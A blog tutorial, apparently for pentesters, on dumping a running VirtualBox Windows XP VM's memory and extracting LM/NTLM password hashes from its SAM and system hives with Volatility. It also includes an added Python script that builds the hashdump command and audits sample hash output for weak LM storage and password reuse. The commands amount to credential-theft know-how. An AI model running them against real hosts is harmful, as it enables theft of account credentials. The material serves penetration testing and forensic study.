Windows Credentials and Memory Dumps – Part 5: Virtualbox & LM/NTLM Hashes

For this part I'm using the standalone version of Volatility for Windows. The goal is to dump LM/NTLM hashes from a Windows memory image.
When you have access to a host where virtual machines are running, but not to the VMs themselves, one possibility is to reboot the VM from an ISO and reset or steal the password that way. Of course this is very noisy, and for a pentester there are better ways: with VirtualBox you can dump a VM's memory while it is running.
For this test I am running an old Windows XP SP2 box in VirtualBox. The host system is running Windows 8.1.
Dump the memory:
C:\Program Files\Oracle\VirtualBox>vboxmanage debugvm "WinXP_1" dumpvmcore --filename c:\Users\dax\Downloads\test.elf
From here on it is the usual steps:
C:\Users\dax\Downloads\>volatility-2.4.standalone.exe imageinfo -f test.elf
Volatility Foundation Volatility Framework 2.4
Determining profile based on KDBG search…
          Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)
                     AS Layer1 : IA32PagedMemory (Kernel AS)
                     AS Layer2 : OSXPmemELF (Unnamed AS)
                     AS Layer3 : FileAddressSpace (C:\Users\dax\Downloads\volati\test.elf)
                      PAE type : No PAE
                           DTB : 0x39000L
                          KDBG : 0x8054cde0L
          Number of Processors : 1
     Image Type (Service Pack) : 3
                KPCR for CPU 0 : 0xffdff000L
             KUSER_SHARED_DATA : 0xffdf0000L
           Image date and time : 2016-01-22 10:11:07 UTC+0000
     Image local date and time : 2016-01-22 11:11:07 +0100
C:\Users\dax\Downloads\>volatility-2.4.standalone.exe hivelist -f test.elf --profile WinXPSP2x86
Volatility Foundation Volatility Framework 2.4
Virtual    Physical   Name
---------- ---------- ----
0xe1064380 0x043bf380 \??\C:\Dokumente und Einstellungen\x\Lokale Einstellungen\
0xe1078b60 0x04492b60 \Device\HarddiskVolume1\Dokumente und Einstellungen\x\NTUS
0xe1b4bb60 0x1c5c0b60 \Device\HarddiskVolume1\Dokumente und Einstellungen\LocalS
ervice\Lokale Einstellungen\Anwendungsdaten\Microsoft\Windows\UsrClass.dat
0xe1ca9b60 0x1c562b60 \Device\HarddiskVolume1\Dokumente und Einstellungen\LocalS
0xe19f9b60 0x1bf35b60 \Device\HarddiskVolume1\Dokumente und Einstellungen\Networ
kService\Lokale Einstellungen\Anwendungsdaten\Microsoft\Windows\UsrClass.dat
0xe19a77b0 0x1bb727b0 \Device\HarddiskVolume1\Dokumente und Einstellungen\Networ
0xe186f008 0x1c113008 \Device\HarddiskVolume1\WINDOWS\system32\config\software
0xe1875b60 0x1c11eb60 \Device\HarddiskVolume1\WINDOWS\system32\config\default
0xe187d008 0x1c135008 \Device\HarddiskVolume1\WINDOWS\system32\config\SAM
0xe186fb60 0x1c113b60 \Device\HarddiskVolume1\WINDOWS\system32\config\SECURITY
0xe13cd008 0x02c2c008 [no name]
0xe1035b60 0x028d2b60 \Device\HarddiskVolume1\WINDOWS\system32\config\system
0xe102e008 0x028cc008 [no name]
For retrieving the hashes, two values from the hivelist output are needed in the next step:
-y = virtual offset of the system hive
-s = virtual offset of the SAM hive
C:\Users\dax\Downloads\>volatility-2.4.standalone.exe hashdump -f test.elf --profile WinXPSP2x86 -y 0xe1035b60 -s 0xe187d008
Volatility Foundation Volatility Framework 2.4
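As an added example (not code from the original post or from the Volatility project), the following Python script automates the hand-off between the hivelist and hashdump steps and then looks at hashdump output the way a defender would. It parses the hivelist lines copied from above to pick the -y (system) and -s (SAM) virtual offsets, builds the hashdump command line without running Volatility, and audits hashdump-style output for accounts that still store an LM hash, accounts with an empty password, and accounts that share the same NT hash. The hashdump lines are constructed for this example; apart from the two well-known empty-password constants, the hash values are made-up placeholders.

```python
import re

# Hivelist output lines taken from the blog post above (volatility 2.4, profile WinXPSP2x86).
# Columns: virtual offset, physical offset, hive name. Raw string keeps the backslashes literal.
HIVELIST_OUTPUT = r"""
Virtual    Physical   Name
---------- ---------- ----
0xe1078b60 0x04492b60 \Device\HarddiskVolume1\Dokumente und Einstellungen\x\NTUS
0xe186f008 0x1c113008 \Device\HarddiskVolume1\WINDOWS\system32\config\software
0xe1875b60 0x1c11eb60 \Device\HarddiskVolume1\WINDOWS\system32\config\default
0xe187d008 0x1c135008 \Device\HarddiskVolume1\WINDOWS\system32\config\SAM
0xe186fb60 0x1c113b60 \Device\HarddiskVolume1\WINDOWS\system32\config\SECURITY
0xe13cd008 0x02c2c008 [no name]
0xe1035b60 0x028d2b60 \Device\HarddiskVolume1\WINDOWS\system32\config\system
0xe102e008 0x028cc008 [no name]
"""

# Well-known hash values of the empty password (LM and NT respectively).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed hashdump output in pwdump format (user:rid:lmhash:nthash:::).
# Apart from the two empty-password constants, the hash values are made-up placeholders.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
x:1003:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
svc_backup:1004:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
"""

HIVE_LINE = re.compile(r"^(0x[0-9a-f]+)\s+(0x[0-9a-f]+)\s+(.+)$", re.IGNORECASE)


def parse_hivelist(text):
    """Return (virtual, physical, name) tuples for every hive line; header and blanks are skipped."""
    hives = []
    for line in text.splitlines():
        match = HIVE_LINE.match(line.strip())
        if match:
            hives.append((int(match.group(1), 16), int(match.group(2), 16), match.group(3).strip()))
    return hives


def find_hive(hives, basename):
    """Virtual offset of the single hive whose path ends in \\basename (case-insensitive)."""
    suffix = "\\" + basename.lower()
    matches = [virt for virt, _phys, name in hives if name.lower().endswith(suffix)]
    if len(matches) != 1:
        raise ValueError("expected exactly one %s hive, found %d" % (basename, len(matches)))
    return matches[0]


def hashdump_args(hives, image="test.elf", profile="WinXPSP2x86"):
    """Argument list for the hashdump step: -y is the system hive, -s the SAM hive."""
    return ["volatility-2.4.standalone.exe", "hashdump", "-f", image, "--profile", profile,
            "-y", hex(find_hive(hives, "system")), "-s", hex(find_hive(hives, "SAM"))]


def audit_hashdump(text):
    """Flag accounts that still store an LM hash, have an empty password, or share an NT hash."""
    findings = {"lm_stored": [], "empty_password": [], "shared_nt": []}
    users_by_nt = {}
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4:
            continue  # not a pwdump-style record
        user, lm, nt = parts[0], parts[2].lower(), parts[3].lower()
        if lm != EMPTY_LM:
            findings["lm_stored"].append(user)  # LM hash present: NoLMHash not in effect here
        if nt == EMPTY_NT:
            findings["empty_password"].append(user)
        users_by_nt.setdefault(nt, []).append(user)
    # The same NT hash on two accounts means the same password (reuse across accounts).
    findings["shared_nt"] = [users for nt, users in users_by_nt.items()
                             if nt != EMPTY_NT and len(users) > 1]
    return findings


if __name__ == "__main__":
    hives = parse_hivelist(HIVELIST_OUTPUT)
    print(" ".join(hashdump_args(hives)))
    for kind, users in audit_hashdump(SAMPLE_HASHDUMP).items():
        print(kind, users)
```

The LM check is the one worth acting on: Windows XP stores an LM hash for every password of 14 characters or fewer unless the NoLMHash policy is set, and LM hashes are far cheaper to crack than NT hashes, so any account in `lm_stored` shows that the policy was not applied on the dumped system.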
